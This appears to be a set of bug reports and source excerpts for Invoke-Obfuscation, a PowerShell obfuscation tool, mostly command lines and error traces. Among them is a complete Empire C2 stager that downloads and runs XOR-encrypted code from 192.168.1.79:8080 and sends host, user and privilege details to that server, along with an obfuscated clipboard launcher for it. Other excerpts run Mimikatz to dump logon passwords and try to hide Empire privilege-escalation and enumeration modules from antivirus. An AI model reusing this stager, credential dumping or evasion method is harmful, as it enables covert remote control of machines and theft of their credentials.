PS> Invoke-Obfuscation -ScriptBlock {$DN = "DC=$($Domain.Replace(',', ',DC='))"} -Command 'Token\String\2' -Quiet


Outputting ObfuscatedCommand to stdout and exiting since -Command was specified and -NoExit was not specified:

$DN = DC=$($Domain.Replace(',', ',DC='))

PS> Invoke-Obfuscation -ScriptBlock {$DN = "DC=$($Domain.Replace(',', ',DC='))"} -Command 'Token\String\2,Token\Command\3' -Quiet


Outputting ObfuscatedCommand to stdout and exiting since -Command was specified and -NoExit was not specified:

$DN = &((("{4}{1}{3}{2}{6}{7}{8}{5}{9}{0}{10}"-f '=','Re','0},','place({','DC={1}({1}Domain.',',D','{','0}, {0','}','C',
'{0}))'))-F  [ChAr]39,[ChAr]36)

PS> $DN = &((("{4}{1}{3}{2}{6}{7}{8}{5}{9}{0}{10}"-f '=','Re','0},','place({','DC={1}({1}Domain.',',D','{','0}, {0','}','C','{0}))'))-F  [ChAr]39,[ChAr]36)
& : The term 'DC=$($Domain.Replace(',', ',DC='))' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try
again.
At line:1 char:8
+ $DN = &((("{4}{1}{3}{2}{6}{7}{8}{5}{9}{0}{10}"-f '=','Re','0},','plac ...
+        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (DC=$($Domain.Replace(',', ',DC=')):String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException

# If a variable is present in a string, more work needs to be done to extract from string. Warning maybe should be thrown either way.
# Must come back and address this after vacation.
# Variable can be displaying or setting: "setting var like $($var='secret') and now displaying $var"
# For now just split on whitespace instead of passing to Out-Concatenated
$ContainsVariableSpecialCases = $False
...
    # For Parameter Binding the value has to either be plain concatenation or must be a scriptblock in which case we will encapsulate with {} instead of ().
    # Actual error that led to this is: "Attribute argument must be a constant or a script block."
    # ALLOWED     :: [CmdletBinding(DefaultParameterSetName={"{1}{0}{2}"-f'd','DumpCre','s'})]
    # NOT ALLOWED :: [CmdletBinding(DefaultParameterSetName=("{1}{0}{2}"-f'd','DumpCre','s'))]
    If($EncapsulateAsScriptBlockInsteadOfParentheses)
    {
        $ObfuscatedToken = '{' + $ObfuscatedToken + '}'
    }
    ElseIf(($ObfuscatedToken.Length -eq $TokenContent.Length + 5) -AND $ObfuscatedToken.SubString(2,$ObfuscatedToken.Length-4) -eq ($TokenContent + ' '))
    {
        If($ContainsVariableSpecialCases) {
            $ObfuscatedToken = '"' + $TokenContent +'"'
        }
        Else {
            $ObfuscatedToken = $TokenContent
        }
    }
    ElseIf
...

PS> git clone https://github.com/danielbohannon/Invoke-Obfuscation.git
PS> Import-Module ./Invoke-Obfuscation/Invoke-Obfuscation.psd1

[SysteM.NEt.SErvIcEPOintMaNAgEr]::ExPect100ContINue = 0;
$wc=New-OBJEct SystEM.NeT.WEBCLIent;
$K='`m!.GWr&tX>+ZIVa=L^}S#:x2bz{3gC\';
$I=0;
[ChAr[]]$b=([cHAr[]]($wc.DowNLoAdStRiNG("http://192.168.1.79:8080/index.asp")))|%{$_-bXoR$k[$i++%$K.LeNgtH]};
IEX ($b-jOIn'')

FUnctIoN StArt-NeGotiAte{param($s,$SK,$UA="lol")AdD-TYpe -AsSembLy SYsTEM.SECurItY;ADd-TYpE -assemBLY SysTEm.CORE;$ErrorActionPreference = "SilentlyContinue";$e=[SysTEM.TeXT.ENcOdING]::ASCII;$AES=NEw-OBjEct SyStEM.SEcuritY.CryPtogrAPHY.AEsCryptoSeRvIcEProVIdER;$IV = [bYte] 0..255 | GeT-RanDOm -COUNT 16;$AES.Mode="CBC"; $AES.Key=$e.GetBytes($SK); $AES.IV = $IV;$cSP = NEw-OBJEct SYStem.SEcURiTy.CRyptOgraPhy.CsPPARaMeTERS;$CsP.FLAgs = $csP.FLAgs -BoR [SyStem.SecUriTy.CrypToGraPHy.CSpPRoViDerFlAgS]::UsEMaCHINEKeYSTore;$Rs = New-OBJECt SYSTeM.SeCuRiTY.CryptoGRAPhY.RSACRypToSeRVICePROvidEr -ARguMENTLIsT 2048,$Csp;$rK=$Rs.ToXMLSTrING($FaLSe);$r=1..16|FOREAcH-ObJEcT{Get-RAndOM -Max 26};$ID=('ABCDEFGHKLMNPRSTUVWXYZ123456789'[$r] -joiN '');$Ib=$e.GetBYTeS($rk);$Eb=$IV+$AES.CReaTEEnCRYptor().TRANSFOrmFiNALBLOCK($iB,0,$IB.LENgTh);if(-NoT $wc){$wC=NEw-oBJECT systeM.neT.WeBCLIEnt;$wc.ProxY = [SYstEM.NeT.WEbReQuesT]::GETSYStEmWebProxY();$WC.PROxY.CredEntIAlS = [SyStEm.NEt.CReDEnTIALCaChe]::DeFaULTCrEdENTIAls;}$wc.Headers.Add("User-Agent",$UA);$wc.Headers.Add("Cookie","SESSIONID=$ID");$raw=$wc.UploadData($s+"index.jsp","POST",$eb);$dE=$E.GEtSTRIng($Rs.DEcRYPt($Raw,$faLSe));$Epoch=$dE[0..9] -JOIn'';$key=$De[10..$de.LENGTh] -JOin '';$AES=NEw-OBjecT SYstem.SeCUriTY.CryptOGRapHY.AeSCrypToServicEPROVIDEr;$IV = [bYTE] 0..255 | GeT-RaNdOm -COUNT 16;$AES.Mode="CBC"; $AES.Key=$e.GetBytes($key); $AES.IV = $IV;$i=$s+'|'+[EnViRoNmEnt]::USeRDOMAInNAme+'|'+[ENVIRONmenT]::USeRNamE+'|'+[EnViroNment]::MaChineName;$p=(GWMi Win32_NEtwoRKADAPTeRCOnfIgURATion|WheRE{$_.IPADdREsS}|SeleCt -EXPanD IPADdReSS);$ip = @{$truE=$P[0];$fAlSe=$p}[$P.LEngtH -lT 6];if(!$IP -Or $Ip.TRiM() -eq '') {$iP='0.0.0.0'};$i+="|$ip";$I+='|'+(GeT-WMIObJECt WIn32_OPEraTINgSYstem).NAME.SPLIT('|')[0];if(([Environment]::UserName).ToLower() -eq "system"){$i+='|True'}else {$i += "|" +([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")}$n=[SystEM.DIagnoSTICS.PRoCess]::GetCurRENtPRocEss();$I+='|'+$N.PRocEssNaME+'|'+$N.ID;$i += '|' + $PSVersiOnTabLE.PSVErSIon.MAJOr;$Ib2=$e.geTbyTEs($I);$eB2=$IV+$AES.CrEaTEEncRyPtOR().TRAnSfORMFiNALBlOcK($IB2,0,$IB2.LEnGTh);$wc.Headers.Add("User-Agent",$UA);$raw=$wc.UploadData($s+"index.php","POST",$eb2);$AES=NeW-OBjeCt SYSTEM.SEcuRity.CRypTOGRapHy.AESCrYptOSerVicEPRovidEr;$AES.Mode="CBC";$IV = $RaW[0..15];$AES.KEy=$E.GETBYtEs($kEy);$AES.IV = $IV;IEX $([SYStEM.Text.EnCODInG]::ASCII.GeTSTRING( $($AES.CreATEDecRyPtoR().TrANSfoRMFiNAlBLoCK($RAw[16..$rAw.LengTh],0,$rAW.LengTH-16))));$AES=$NuLL;$S2=$null;$wc=$NUll;$EB2=$nUll;$Raw=$NuLl;$IV=$Null;$wC=$nuLl;$I=$Null;$ib2=$NulL;[GC]::COlLEcT();Invoke-Empire -Servers @(($s -split "/")[0..2] -join "/") -SessionKey $key -SessionID $ID -Epoch $epoch;} Start-Negotiate -s "http://192.168.1.79:8080/" -SK '`m!.GWr&tX>+ZIVa=L^}S#:x2bz{3gC\' -UA $u;

PS> Invoke-Obfuscation -ScriptPath ./launcher -Command 'Launcher,CLIP++,57' -Quiet -NoExit
Invoke-Obfuscation\Launcher\Clip++> copy

C:\>Cmd.exE/c   "eCho/[SysteM.NEt.SErvIcEPOintMaNAgEr]::ExPect100Con
INue = 0;$wc=New-OBJEct SystEM.NeT.WEBCLIent;$K='`m!.GWr^^^&tX^^^>+ZIVa=L^}S#:x
bz{3gC\';$I=0;[ChAr[]]$b=([cHAr[]]($wc.DowNLoAdStRiNG("http://192.168.1.79:8080
index.asp")))^^^|%{$_-bXoR$k[$i++%$K.LeNgtH]};IEX ($b-jOIn'') | c:\wiNdOWs\sYst
M32\clIP&&Cmd.exE/c PowerSHELL -st -eXecu BYPass  -Comm    ^^^&  (  \"{1}{0}{2}
"-f 'd','A',(\"{0}{1}\" -f 'd-Typ','e' )) -Asse (  \"{4}{6}{0}{5}{3}{1}{2}\" -f
o','m','s','r',( \"{0}{2}{1}\" -f 'Sy','.','stem'  ),( \"{1}{0}\"-f 'Fo','ws.'
),( \"{1}{0}\" -f 'd','Win'  ))    ; ${EXECutIOncONTEXt}.\"iNvOkEc`O`m`MAND\".\
INv`OkesC`RI`pt\"( ( [sySTem.WiNDoWS.FORMS.ClIPboard]::( \"{0}{2}{1}\" -f'Ge','
',( \"{0}{1}\"-f 't','teX') ).\"iNvO`kE\"(  )) )  ;  [System.Windows.Forms.Clip
oard]::( \"{0}{1}\"-f(  \"{0}{1}{2}\"-f 'S','et','Tex' ),'t' ).\"inV`oKe\"(  '
 )"
Exception calling "InvokeScript" with "1" argument(s): "At line:1 char:38
+ funCTIOn StArt-NEgLZ↓x▬☼+h`:5I7↑~`+:[    pm[7↔|s§u0uIs=☻X_h4(o♥~NS-: ...
+                                      ~
Missing function body in function declaration.
At line:2 char:56
+ DT♥l↔<1‼Z→nB→@♀d[(vg?T%K⌂IU[ ?/S♫♠K7↓⌂Bm[I"DN∟-HbE>♫~
+                                                        ~
Missing closing ')' in expression.
At line:3 char:40
+ We3IY:m4`)D#JI1e-+xH☼?Z]WtR☼↨∟v♦f↑0$b~,}qzw&:m◄i)c#←
+                                        ~
Missing expression after ',' in pipeline element.
At line:3 char:40
+ We3IY:m4`)D#JI1e-+xH☼?Z]WtR☼↨∟v♦f↑0$b~,}qzw&:m◄i)c#←
+                                        ~
Unexpected token '}' in expression or statement.
At line:3 char:44
+ We3IY:m4`)D#JI1e-+xH☼?Z]WtR☼↨∟v♦f↑0$b~,}qzw&:m◄i)c#←
+                                            ~
The ampersand (&) character is not allowed. The & operator is reserved for
future use; wrap an ampersand in double quotation marks ("&") to pass it as
part of a string.
At line:3 char:49
+ We3IY:m4`)D#JI1e-+xH☼?Z]WtR☼↨∟v♦f↑0$b~,}qzw&:m◄i)c#←
+                                                 ~
Unexpected token ')' in expression or statement.
At line:4 char:31
+ z6☻▬§`→RS-⌂?t{!aHzY↔n;C!>xWP#|@ R8cv(I>25qvq▼o♥☻§?~b:"B↑♦☼p69t♀<Qo♦♠M ...
+                               ~
Unrecognized token in source text.
At line:6 char:71
+ ... Bbj?98TCnBaW(ox☼◄⌂r▼rW‼Eg♣S'?sdbm☻j|ZbX~. D$:1►s §←hY|→R"i.!←;♂{8 `P ...
+                                                                  ~
Missing closing ')' in expression.
At line:6 char:73
+ ... ?98TCnBaW(ox☼◄⌂r▼rW‼Eg♣S'?sdbm☻j|ZbX~. D$:1►s §←hY|→R"i.!←;♂{8 `Pv↑X ...
+                                                                 ~
Missing closing '}' in statement block or type definition.
At line:4 char:14
+ z6☻▬§`→RS-⌂?t{!aHzY↔n;C!>xWP#|@ R8cv(I>25qvq▼o♥☻§?~b:"B↑♦☼p69t♀<Qo♦♠M ...
+              ~
Missing closing '}' in statement block or type definition.
Not all parse errors were reported.  Correct the reported errors and try
again."
At line:1 char:195
+ ... ,'Win' )) ; ${EXECutIOncONTEXt}."iNvOkEc`O`m`MAND"."INv`OkesC`RI`pt"( ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CmdletInvocationException

[ChAr[]]$b=([cHAr[]]($wc.DowNLoAdStRiNG("http://192.168.1.79:8080/index.asp")))|%{$_-bXoR$k[$i++%$K.LeNgtH]};

Exception calling "InvokeScript" with "1" argument(s): "At line:1 char:38
+ funCTIOn StArt-NEgLZ↓x▬☼+h`:5I7↑~`+:[    pm[7↔|s§u0uIs=☻X_h4(o♥~NS-: ...

PS> Invoke-Obfuscation -ScriptPath 'https://raw.githubusercontent.com/EmpireProject/Empire/2.0_beta/data/module_source/privesc/PowerUp.ps1' -Command 'Token\All\1' -Quiet
Exception calling "Create" with "1" argument(s): "At line:675 char:17                                                                         
+ ... [OutputType(("{4}{5}{0}{3}{1}{2}"-f'eCo','oll','er','ntr','ServicePro ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Attribute argument must be a constant or a script block.
At line:826 char:17
+ ... [OutputType(("{4}{2}{9}{5}{8}{1}{0}{7}{6}{3}" -f '.Serv','s','r','ont ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Attribute argument must be a constant or a script block."
At /opt/Invoke-Obfuscation/Out-ObfuscatedTokenCommand.ps1:137 char:13
+             $ScriptString = Out-ObfuscatedTokenCommand ([ScriptBlock] ...
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : ParseException
 
Exception calling "Create" with "1" argument(s): "At line:675 char:17
+ ... [OutputType(("{4}{5}{0}{3}{1}{2}"-f'eCo','oll','er','ntr','ServicePro ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Attribute argument must be a constant or a script block.
At line:826 char:17
+ ... [OutputType(("{4}{2}{9}{5}{8}{1}{0}{7}{6}{3}" -f '.Serv','s','r','ont ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Attribute argument must be a constant or a script block."
At /opt/Invoke-Obfuscation/Out-ObfuscatedTokenCommand.ps1:137 char:13
+             $ScriptString = Out-ObfuscatedTokenCommand ([ScriptBlock] ...
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : ParseException
 
Exception calling "Create" with "1" argument(s): "At line:675 char:17
+ ... [OutputType(("{4}{5}{0}{3}{1}{2}"-f'eCo','oll','er','ntr','ServicePro ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Attribute argument must be a constant or a script block.
At line:826 char:17
+ ... [OutputType(("{4}{2}{9}{5}{8}{1}{0}{7}{6}{3}" -f '.Serv','s','r','ont ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Attribute argument must be a constant or a script block."
At /opt/Invoke-Obfuscation/Out-ObfuscatedTokenCommand.ps1:137 char:13
+             $ScriptString = Out-ObfuscatedTokenCommand ([ScriptBlock] ...
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : ParseException
 
Exception calling "Create" with "1" argument(s): "At line:675 char:17
+ ... [OutputType(("{4}{5}{0}{3}{1}{2}"-f'eCo','oll','er','ntr','ServicePro ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Attribute argument must be a constant or a script block.
At line:826 char:17
+ ... [OutputType(("{4}{2}{9}{5}{8}{1}{0}{7}{6}{3}" -f '.Serv','s','r','ont ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Attribute argument must be a constant or a script block."
At /opt/Invoke-Obfuscation/Out-ObfuscatedTokenCommand.ps1:137 char:13
+             $ScriptString = Out-ObfuscatedTokenCommand ([ScriptBlock] ...
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : ParseException
 
Exception calling "Create" with "1" argument(s): "At line:675 char:17
+ ... [OutputType(("{4}{5}{0}{3}{1}{2}"-f'eCo','oll','er','ntr','ServicePro ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Attribute argument must be a constant or a script block.
At line:826 char:17
+ ... [OutputType(("{4}{2}{9}{5}{8}{1}{0}{7}{6}{3}" -f '.Serv','s','r','ont ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Attribute argument must be a constant or a script block."
At /opt/Invoke-Obfuscation/Out-ObfuscatedTokenCommand.ps1:137 char:13
+             $ScriptString = Out-ObfuscatedTokenCommand ([ScriptBlock] ...
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : ParseException

# The below Parameter Binding Validation Attributes cannot have their string values formatted with the -f format operator unless treated as a scriptblock.
# When we find strings following these Parameter Binding Validation Attributes then if we are using a -f format operator we will treat the result as a scriptblock.
# Source: https://technet.microsoft.com/en-us/library/hh847743.aspx
$ParameterValidationAttributesToTreatStringAsScriptblock  = @()
$ParameterValidationAttributesToTreatStringAsScriptblock += 'alias'
$ParameterValidationAttributesToTreatStringAsScriptblock += 'allownull'
$ParameterValidationAttributesToTreatStringAsScriptblock += 'allowemptystring'
$ParameterValidationAttributesToTreatStringAsScriptblock += 'allowemptycollection'
$ParameterValidationAttributesToTreatStringAsScriptblock += 'validatecount'
$ParameterValidationAttributesToTreatStringAsScriptblock += 'validatelength'
$ParameterValidationAttributesToTreatStringAsScriptblock += 'validatepattern'
$ParameterValidationAttributesToTreatStringAsScriptblock += 'validaterange'
$ParameterValidationAttributesToTreatStringAsScriptblock += 'validatescript'
$ParameterValidationAttributesToTreatStringAsScriptblock += 'validateset'
$ParameterValidationAttributesToTreatStringAsScriptblock += 'validatenotnull'
$ParameterValidationAttributesToTreatStringAsScriptblock += 'validatenotnullorempty'

$ParameterValidationAttributesToTreatStringAsScriptblock += 'helpmessage'
$ParameterValidationAttributesToTreatStringAsScriptblock += 'confirmimpact'
$ParameterValidationAttributesToTreatStringAsScriptblock += 'outputtype'

PS> cat .\Invoke-Example.ps1
function Invoke-Example {

    [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')]
    Param ([String] $Example)
    Write-Host $Example
}
PS > Invoke-Obfuscation -ScriptPath .\Invoke-Example.ps1 -Command 'Token\All\1,Out Invoke-ObfuscatedExample.ps1' -Quiet

Outputting ObfuscatedCommand to stdout and exiting since -Command was specified and -NoExit was not specified:

function I`NVOkE`-e`xa`Mple {

    [CmdletBinding(suPPORTssHoUlDpROCESS = ${t`RUE}, cOnfirmimpact = {"{1}{2}{0}"-f 'ium','M','ed'})]
    Param ([String] ${EX`AMP`Le})
    &("{2}{0}{3}{1}"-f 'te','ost','Wri','-H') ${eXA`mPle}
}
PS> Import-Module .\Invoke-ObfuscatedExample.ps1
PS> INVOkE-exaMple -Example example
Cannot convert the ""{1}{2}{0}"-f 'ium','M','ed'" value of type "System.Management.Automation.ScriptBlock" to type
"System.Management.Automation.ConfirmImpact".
At line:1 char:1
+ INVOkE-exaMple -Example example
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidArgument: (:) [], RuntimeException
    + FullyQualifiedErrorId : ConvertToFinalInvalidCastException

If(($SubString.Contains('parametersetname') -OR $SubString.Contains('confirmimpact')) -AND !$SubString.Contains('defaultparametersetname') -AND $SubString.Contains('='))
{
    # For strings in ParameterSetName parameter binding (but not DefaultParameterSetName) then we will only obfuscate with tick marks.
    # Otherwise we may get errors depending on the version of PowerShell being run.
    $ObfuscatedToken = $Token.Content
    $TokenForTicks = [System.Management.Automation.PSParser]::Tokenize($ObfuscatedToken,[ref]$null)
    $ObfuscatedToken = '"' + (Out-ObfuscatedWithTicks $ObfuscatedToken $TokenForTicks[0]) + '"'
}

Import-Module .\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command "sekurlsa::logonPasswords"

	Hostname: *** / -

	  .#####.   mimikatz 2.2.0 (x64) #19041 Oct  4 2020 10:28:51
	 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
	 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
	 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
	 '## v ##'       Vincent LE TOUX             ( [email protected] )
	  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

Import-Module -Global -Force ..\..\Invoke-Obfuscation\Invoke-Obfuscation.psd1
Invoke-Obfuscation -ScriptPath .\Invoke-Mimikatz.ps1 -command "TOKEN\\ARGUMENT\\2" -Quiet |Out-File -encoding ascii obfuscated.ps1
Import-Module -Global -Force .\obfuscated.ps1
Invoke-Mimikatz -Command "sekurlsa::logonPasswords"

Exception lors de l'appel de « GetDelegateForFunctionPointer » avec « 2 » argument(s) : « La valeur ne peut pas être null.
Nom du paramètre : ptr »
Au caractère obfuscated.ps1:489 : 9
+         $VirtualAlloc = [System.Runtime.InteropServices.Marshal]::Get ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : ArgumentNullException

Exception lors de l'appel de « GetDelegateForFunctionPointer » avec « 2 » argument(s) : « La valeur ne peut pas être null.
Nom du paramètre : ptr »
Au caractère obfuscated.ps1:494 : 9
+         $VirtualAllocEx = [System.Runtime.InteropServices.Marshal]::G ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : ArgumentNullException

Exception lors de l'appel de « GetDelegateForFunctionPointer » avec « 2 » argument(s) : « La valeur ne peut pas être null.
Nom du paramètre : ptr »
Au caractère obfuscated.ps1:499 : 9
+         $memcpy = [System.Runtime.InteropServices.Marshal]::GetDelega ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : ArgumentNullException
(...)

Import-Module -Global -Force .\Invoke-Obfuscation\Invoke-Obfuscation.psd1
Invoke-Obfuscation -ScriptPath .\Invoke-Mimikatz.ps1 -command "AST\\ALL\\1" -Quiet |Out-File -encoding ascii obfuscated.ps1
Import-Module -Global -Force .\obfuscated.ps1
Invoke-Mimikatz -Command "sekurlsa::logonPasswords"

Can't find process 0
Au caractère obfuscated.ps1:2540 : 17
+                 Throw "Can't find process $ProcName"
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : OperationStopped: (Can't find process 0:String) [], RuntimeException
    + FullyQualifiedErrorId : Can't find process 0

Exception lors de l'appel de « Substring » avec « 2 » argument(s) : « La longueur ne peut pas être inférieure à zéro.
Nom du paramètre : length »
Au caractère Invoke-Obfuscation\Out-ObfuscatedAst.ps1:5738 : 17
+ ...             $ObfuscatedExtent = [String] $ObfuscatedExtent.Substring( ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : ArgumentOutOfRangeException

Exception lors de l'appel de « Substring » avec « 1 » argument(s) : « StartIndex ne peut pas être inférieur à zéro.
Nom du paramètre : startIndex »
Au caractère Invoke-Obfuscation\Out-ObfuscatedAst.ps1:5745 : 17
+ ...             $ObfuscatedExtent += [String] $AbstractSyntaxTree.Extent. ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : ArgumentOutOfRangeException

Exception lors de l'appel de « Substring » avec « 2 » argument(s) : « La longueur ne peut pas être inférieure à zéro.
Nom du paramètre : length »
Au caractère Invoke-Obfuscation\Out-ObfuscatedAst.ps1:5738 : 17
+ ...             $ObfuscatedExtent = [String] $ObfuscatedExtent.Substring( ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : ArgumentOutOfRangeException

Exception lors de l'appel de « Substring » avec « 1 » argument(s) : « StartIndex ne peut pas être inférieur à zéro.
Nom du paramètre : startIndex »
Au caractère Invoke-Obfuscation\Out-ObfuscatedAst.ps1:5745 : 17
+ ...             $ObfuscatedExtent += [String] $AbstractSyntaxTree.Extent. ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : ArgumentOutOfRangeException

Exception lors de l'appel de « Substring » avec « 2 » argument(s) : « La longueur ne peut pas être inférieure à zéro.
Nom du paramètre : length »
Au caractère Invoke-Obfuscation\Out-ObfuscatedAst.ps1:5738 : 17
+ ...             $ObfuscatedExtent = [String] $ObfuscatedExtent.Substring( ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : ArgumentOutOfRangeException

Exception lors de l'appel de « Substring » avec « 1 » argument(s) : « StartIndex ne peut pas être inférieur à zéro.
Nom du paramètre : startIndex »
Au caractère Invoke-Obfuscation\Out-ObfuscatedAst.ps1:5745 : 17
+ ...             $ObfuscatedExtent += [String] $AbstractSyntaxTree.Extent. ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : ArgumentOutOfRangeException

Exception lors de l'appel de « Substring » avec « 2 » argument(s) : « La longueur ne peut pas être inférieure à zéro.
Nom du paramètre : length »
Au caractère Invoke-Obfuscation\Out-ObfuscatedAst.ps1:5738 : 17
+ ...             $ObfuscatedExtent = [String] $ObfuscatedExtent.Substring( ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : ArgumentOutOfRangeException

Exception lors de l'appel de « Substring » avec « 1 » argument(s) : « StartIndex ne peut pas être inférieur à zéro.
Nom du paramètre : startIndex »
Au caractère Invoke-Obfuscation\Out-ObfuscatedAst.ps1:5745 : 17
+ ...             $ObfuscatedExtent += [String] $AbstractSyntaxTree.Extent. ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : ArgumentOutOfRangeException

Import-Module ./Invoke-Obfuscation.psd1

Invoke-Obfuscation

Invoke-Obfuscation : The term 'Invoke-Obfuscation' is not recognized as the name of a cmdlet, function, script file, or
 operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try a
gain.
At line:1 char:1
+ Invoke-Obfuscation
    + CategoryInfo          : ObjectNotFound: (Invoke-Obfuscation:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException`
```

PS> git clone https://github.com/danielbohannon/Invoke-Obfuscation.git
PS> wget https://github.com/adaptivethreat/Empire/raw/master/data/module_source/situational_awareness/host/Invoke-WinEnum.ps1
PS> Import-Module .\Invoke-Obfuscation\Invoke-Obfuscation.psm1

[*] Validating necessary commands are loaded into current PowerShell session.

[*] Function Loaded :: Out-ObfuscatedTokenCommand
[*] Function Loaded :: Out-ObfuscatedStringCommand
[*] Function Loaded :: Out-EncodedAsciiCommand
[*] Function Loaded :: Out-EncodedHexCommand
[*] Function Loaded :: Out-EncodedOctalCommand
[*] Function Loaded :: Out-EncodedBinaryCommand
[*] Function Loaded :: Out-SecureStringCommand
[*] Function Loaded :: Out-EncodedBXORCommand
[*] Function Loaded :: Out-PowerShellLauncher
[*] Function Loaded :: Invoke-Obfuscation

[*] All modules loaded and ready to run Invoke-Obfuscation

PS> Out-ObfuscatedTokenCommand -Path .\Invoke-WinEnum.ps1 | Out-File out
Obfuscating Invoke-WinEnum.ps1

[*] Obfuscating 25 Comment tokens.

[*] Obfuscating 155 String tokens.

[*] Obfuscating 66 Argument tokens.

[*] Obfuscating 90 Command tokens.
Exception calling "Create" with "1" argument(s): "At line:116 char:15
+             & &("{0}{1}{2}"-f 'powers','h','ell') -Sta -Command $cmd
+               ~
The ampersand (&) character is not allowed. The & operator is reserved for future use; wrap an ampersand in double quotation marks ("&") to pass it as part of a string."
At <PATH>\Invoke-Obfuscation\Out-ObfuscatedTokenCommand.ps1:137 char:13
+             $ScriptString = Out-ObfuscatedTokenCommand ([ScriptBlock] ...
